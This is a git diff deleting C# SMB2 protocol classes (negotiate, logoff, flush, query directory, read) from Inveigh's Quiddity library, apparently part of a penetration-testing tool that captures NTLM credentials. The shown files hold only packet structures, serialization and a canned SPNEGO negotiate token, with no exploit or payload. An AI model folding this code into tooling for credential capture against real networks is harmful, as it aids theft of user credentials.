a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2FlushResponse.cs +++ /dev/null @@ -1,45 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Collections.Generic; -using System.Linq; -using System.Text; - -namespace Quiddity.SMB2 -{ - class SMB2flushResponse - { - // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/42f78e6a-e25f-48f5-8f08-b4f1bb4c4fa4 - public ushort StructureSize { get; set; } - public ushort Reserved { get; set; } - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2LogoffRequest.cs b/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2LogoffRequest.cs deleted file mode 100644 index 0ab01e9..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2LogoffRequest.cs +++ /dev/null @@ -1,45 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Collections.Generic; -using System.Linq; -using System.Text; - -namespace Quiddity.SMB2 -{ - class SMB2LogoffRequest - { - // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/abdc4ea9-52df-480e-9a36-34f104797d2c - public ushort StructureSize { get; set; } - public byte[] Reserved { get; set; } - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2LogoffResponse.cs b/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2LogoffResponse.cs deleted file mode 100644 index b029745..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2LogoffResponse.cs +++ /dev/null @@ -1,45 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Collections.Generic; -using System.Linq; -using System.Text; - -namespace Quiddity.SMB2 -{ - class SMB2LogoffResponse - { - // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/7539feb4-6fbb-4996-81ac-06863bb1a89e - public ushort StructureSize { get; set; } - public byte[] Reserved { get; set; } - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2NegotiateResponse.cs b/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2NegotiateResponse.cs deleted file mode 100644 index e79210a..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2NegotiateResponse.cs +++ /dev/null @@ -1,164 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.IO; -using Quiddity.GSSAPI; -using Quiddity.SPNEGO; -using Quiddity.Support; - -namespace Quiddity.SMB2 -{ - class SMB2NegotiateResponse - { - // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/63abf97c-0d09-47e2-88d6-6bfa552949a5 - public ushort StructureSize { get; set; } - public ushort SecurityMode { get; set; } - public byte[] DialectRivision { get; set; } - public ushort NegotiateContextCount { get; set; } - public byte[] ServerGUID { get; set; } - public byte[] Capabilities { get; set; } - public uint MaxTransactSize { get; set; } - public uint MaxReadSize { get; set; } - public uint MaxWriteSize { get; set; } - public byte[] SystemTime { get; set; } // todo create type - public byte[] ServerStartTime { get; set; } - public ushort SecurityBufferOffset { get; set; } - public ushort SecurityBufferLength { get; set; } - public uint NegotiateContextOffset { get; set; } - public byte[] Buffer { get; set; } - public byte[] Padding { get; set; } // todo check - public byte[] NegotiateContextList { get; set; } - - public SMB2NegotiateResponse() - { - this.StructureSize = 65; - this.SecurityMode = 1; - this.DialectRivision = new byte[2]; - this.NegotiateContextCount = 0; - this.ServerGUID = new byte[16]; - this.Capabilities = new byte[4]; - this.MaxTransactSize = 8388608; - this.MaxReadSize = 8388608; - this.MaxWriteSize = 8388608; - this.SystemTime = BitConverter.GetBytes(DateTime.Now.ToFileTime()); ; - this.ServerStartTime = new byte[8]; - this.SecurityBufferOffset = 128; - this.SecurityBufferLength = 320; - this.NegotiateContextOffset = 0; - this.Buffer = new byte[0]; - this.Padding = new byte[0]; // todo check - this.NegotiateContextList = new byte[0]; - } - - public SMB2NegotiateResponse(byte[] data, int offset) - { - ReadBytes(data, offset); - } - - public byte[] GetBytes() - { - - using (MemoryStream memoryStream = new MemoryStream()) - { - PacketWriter packetWriter = new PacketWriter(memoryStream); - packetWriter.Write(this.StructureSize); - packetWriter.Write(this.SecurityMode); - packetWriter.Write(this.DialectRivision); - packetWriter.Write(this.NegotiateContextCount); - packetWriter.Write(this.ServerGUID); - packetWriter.Write(this.Capabilities); - packetWriter.Write(this.MaxTransactSize); - packetWriter.Write(this.MaxReadSize); - packetWriter.Write(this.MaxWriteSize); - packetWriter.Write(this.SystemTime); - packetWriter.Write(this.ServerStartTime); - packetWriter.Write(this.SecurityBufferOffset); - packetWriter.Write(this.SecurityBufferLength); - packetWriter.Write(this.NegotiateContextOffset); - packetWriter.Write(this.Buffer); - - if (!Utilities.ArrayIsNullOrEmpty(NegotiateContextList)) - { - packetWriter.Write(this.NegotiateContextList); - } - - return memoryStream.ToArray(); - } - - } - - public void ReadBytes(byte[] data, int offset) - { - - using (MemoryStream memoryStream = new MemoryStream(data)) - { - PacketReader packetReader = new PacketReader(memoryStream); - memoryStream.Position = offset; - this.StructureSize = packetReader.ReadUInt16(); - this.SecurityMode = packetReader.ReadUInt16(); - this.DialectRivision = packetReader.ReadBytes(2); - this.NegotiateContextCount = packetReader.ReadUInt16(); - this.ServerGUID = packetReader.ReadBytes(16); - this.Capabilities = packetReader.ReadBytes(4); - this.MaxTransactSize = packetReader.ReadUInt32(); - this.MaxReadSize = packetReader.ReadUInt16(); - this.MaxWriteSize = packetReader.ReadUInt32(); - this.SystemTime = packetReader.ReadBytes(8); - this.ServerStartTime = packetReader.ReadBytes(8); - this.SecurityBufferOffset = packetReader.ReadUInt16(); - this.SecurityBufferLength = packetReader.ReadUInt16(); - this.NegotiateContextOffset = packetReader.ReadUInt32(); - this.Buffer = packetReader.ReadBytes(8); - } - - } - - public void EncodeBuffer() - { - GSSAPIInitSecContext gssapi = new GSSAPIInitSecContext(); - SPNEGONegTokenInit spnego = new SPNEGONegTokenInit(); - spnego.MechTypes = new byte[24] { 0x06, 0x0a, 0x2b, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x02, 0x02, 0x1e, 0x06, 0x0a, 0x2b, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x02, 0x02, 0x0a }; - spnego.MechToken = new byte[264] { 0x4e, 0x45, 0x47, 0x4f, 0x45, 0x58, 0x54, 0x53, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x70, 0x00, 0x00, 0x00, 0x45, 0x42, 0x37, 0xe2, 0x9c, 0xec, 0xed, 0x6a, 0x73, 0x8a, 0x3e, 0x19, 0x27, 0xdc, 0xa0, 0xb0, 0x64, 0x56, 0x91, 0x92, 0xb4, 0x5c, 0x3d, 0x8d, 0xba, 0x32, 0xd3, 0xb1, 0x31, 0xbc, 0xab, 0x29, 0xfa, 0x47, 0x3d, 0xeb, 0x87, 0x6e, 0x53, 0xd7, 0x0c, 0x91, 0x91, 0xb1, 0xae, 0x9e, 0x6b, 0xd0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x5c, 0x33, 0x53, 0x0d, 0xea, 0xf9, 0x0d, 0x4d, 0xb2, 0xec, 0x4a, 0xe3, 0x78, 0x6e, 0xc3, 0x08, 0x4e, 0x45, 0x47, 0x4f, 0x45, 0x58, 0x54, 0x53, 0x03, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x98, 0x00, 0x00, 0x00, 0x45, 0x42, 0x37, 0xe2, 0x9c, 0xec, 0xed, 0x6a, 0x73, 0x8a, 0x3e, 0x19, 0x27, 0xdc, 0xa0, 0xb0, 0x5c, 0x33, 0x53, 0x0d, 0xea, 0xf9, 0x0d, 0x4d, 0xb2, 0xec, 0x4a, 0xe3, 0x78, 0x6e, 0xc3, 0x08, 0x40, 0x00, 0x00, 0x00, 0x58, 0x00, 0x00, 0x00, 0x30, 0x56, 0xa0, 0x54, 0x30, 0x52, 0x30, 0x27, 0x80, 0x25, 0x30, 0x23, 0x31, 0x21, 0x30, 0x1f, 0x06, 0x03, 0x55, 0x04, 0x03, 0x13, 0x18, 0x54, 0x6f, 0x6b, 0x65, 0x6e, 0x20, 0x53, 0x69, 0x67, 0x6e, 0x69, 0x6e, 0x67, 0x20, 0x50, 0x75, 0x62, 0x6c, 0x69, 0x63, 0x20, 0x4b, 0x65, 0x79, 0x30, 0x27, 0x80, 0x25, 0x30, 0x23, 0x31, 0x21, 0x30, 0x1f, 0x06, 0x03, 0x55, 0x04, 0x03, 0x13, 0x18, 0x54, 0x6f, 0x6b, 0x65, 0x6e, 0x20, 0x53, 0x69, 0x67, 0x6e, 0x69, 0x6e, 0x67, 0x20, 0x50, 0x75, 0x62, 0x6c, 0x69, 0x63, 0x20, 0x4b, 0x65, 0x79 }; - byte[] mechTokenSegment = ASN1.Encode(4, spnego.MechToken); - mechTokenSegment = ASN1.Encode(162, mechTokenSegment); - byte[] mechTypesSegment = ASN1.Encode(48, spnego.MechTypes); - mechTypesSegment = ASN1.Encode(160, mechTypesSegment); - byte[] negTokenInitSegment = Utilities.BlockCopy(mechTypesSegment, mechTokenSegment); - negTokenInitSegment = ASN1.Encode(48, negTokenInitSegment); - negTokenInitSegment = ASN1.Encode(160, negTokenInitSegment); - byte[] gssapiData = Utilities.BlockCopy(gssapi.OID, negTokenInitSegment); - this.Buffer = ASN1.Encode(96, gssapiData); - } - - } - -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2NegotiatelRequest.cs b/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2NegotiatelRequest.cs deleted file mode 100644 index 884c3af..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2NegotiatelRequest.cs +++ /dev/null @@ -1,118 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ - -using Quiddity.Support; -using System; -using System.IO; - -namespace Quiddity.SMB2 -{ - - class SMB2NegotiatelRequest - { - //https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/e14db7ff-763a-4263-8b10-0c3944f52fc5 - public ushort StructureSize { get; set; } - public ushort DialectCount { get; set; } - public ushort SecurityMode { get; set; } - public byte[] Reserved { get; set; } - public byte[] Capabilities { get; set; } - public byte[] ClientGUID { get; set; } - public uint NegotiateContextOffset { get; set; } - public ushort NegotiateContextCount { get; set; } - public byte[] Reserved2 { get; set; } - public byte[] ClientStartTime { get; set; } - public byte[] Dialects { get; set; } - public byte[] Padding { get; set; } // todo check - public byte[] NegotiateContextList { get; set; } - - public SMB2NegotiatelRequest(byte[] data, int offset) - { - ReadBytes(data, offset); - } - - public byte[] GetBytes() - { - - using (MemoryStream memoryStream = new MemoryStream()) - { - PacketWriter packetWriter = new PacketWriter(memoryStream); - packetWriter.Write(this.StructureSize); - packetWriter.Write(this.DialectCount); - packetWriter.Write(this.SecurityMode); - packetWriter.Write(this.Reserved); - packetWriter.Write(this.Capabilities); - packetWriter.Write(this.ClientGUID); - packetWriter.Write(this.NegotiateContextOffset); - packetWriter.Write(this.NegotiateContextCount); - packetWriter.Write(this.Reserved2); - packetWriter.Write(this.ClientStartTime); - packetWriter.Write(this.Dialects); - packetWriter.Write(this.Padding); - packetWriter.Write(this.NegotiateContextList); - return memoryStream.ToArray(); - } - - } - - public ushort GetMaxDialect() - { - byte[] maxDialectData = new byte[2]; - maxDialectData[0] = this.Dialects[this.Dialects.Length - 2]; - maxDialectData[1] = this.Dialects[this.Dialects.Length - 1]; - return Utilities.DataToUInt16(maxDialectData); - } - - public void ReadBytes(byte[] data, int offset) - { - - using (MemoryStream memoryStream = new MemoryStream(data)) - { - PacketReader packetReader = new PacketReader(memoryStream); - memoryStream.Position = offset; - this.StructureSize = packetReader.ReadUInt16(); - this.DialectCount = packetReader.ReadUInt16(); - this.SecurityMode = packetReader.ReadUInt16(); - this.Reserved = packetReader.ReadBytes(2); - this.Capabilities = packetReader.ReadBytes(4); - this.ClientGUID = packetReader.ReadBytes(16); - this.NegotiateContextOffset = packetReader.ReadUInt32(); - this.NegotiateContextCount = packetReader.ReadUInt16(); - this.Reserved2 = packetReader.ReadBytes(2); - this.Dialects = packetReader.ReadBytes(this.DialectCount * 2); - this.Padding = packetReader.ReadBytes(8); - } - - } - - } - -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2QueryDirectoryRequest.cs b/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2QueryDirectoryRequest.cs deleted file mode 100644 index 43c51b2..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2QueryDirectoryRequest.cs +++ /dev/null @@ -1,70 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Collections.Generic; -using System.Linq; -using System.Text; - -namespace Quiddity.SMB2 -{ - enum FileInformationClass : byte - { - FileDirectoryInformation = 0x01, - FileFullDirectoryInformation = 0x02, - FileIdFullDirectoryInformation = 0x26, - FileBothDirectoryInformation = 0x03, - FileIdBothDirectoryInformation = 0x25, - FileNamesInformation = 0x0C - } - - enum QueryDirectoryRequestFlags : byte - { - SMB2_RESTART_SCANS = 0x01, - SMB2_RETURN_SINGLE_ENTRY = 0x02, - SMB2_INDEX_SPECIFIED = 0x04, - SMB2_REOPEN = 0x10 - } - - class SMB2QueryDirectoryRequest - { - // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/10906442-294c-46d3-8515-c277efe1f752 - public ushort StructureSize { get; set; } - public byte FileInformationClass { get; set; } - public byte Flags { get; set; } - public uint FileIndex { get; set; } - public byte[] FileId { get; set; } - public uint FileNameOffset { get; set; } - public uint FileNameLength { get; set; } - public uint OutputBufferLength { get; set; } - public byte[] Buffer { get; set; } - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2QueryDirectoryResponse.cs b/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2QueryDirectoryResponse.cs deleted file mode 100644 index 43534ed..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2QueryDirectoryResponse.cs +++ /dev/null @@ -1,47 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Collections.Generic; -using System.Linq; -using System.Text; - -namespace Quiddity.SMB2 -{ - class SMB2QueryDirectoryResponse - { - // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/4f75351b-048c-4a0c-9ea3-addd55a71956 - public ushort StructureSize { get; set; } - public ushort OutputBufferOffset { get; set; } - public uint OutputBufferLength { get; set; } - public byte[] Buffer { get; set; } - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2ReadRequest.cs b/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2ReadRequest.cs deleted file mode 100644 index 1cbb484..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2ReadRequest.cs +++ /dev/null @@ -1,54 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Collections.Generic; -using System.Linq; -using System.Text; - -namespace Quiddity.SMB2 -{ - class SMB2ReadRequest - { - // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/320f04f3-1b28-45cd-aaa1-9e5aed810dca - public ushort StructureSize { get; set; } - public byte Padding { get; set; } - public byte Flags { get; set; } - public uint Length { get; set; } - public ulong Offset { get; set; } - public byte[] Field { get; set; } - public uint MinimumCount { get; set; } - public byte[] Channel { get; set; } - public uint RemainingBytes { get; set; } - public ushort ReadChannelInfoOffset { get; set; } - public byte[] Buffer { get; set; } - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2ReadResponse.cs b/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2ReadResponse.cs deleted file mode 100644 index 4d5f52f..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2ReadResponse.cs +++ /dev/null @@ -1,42 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, 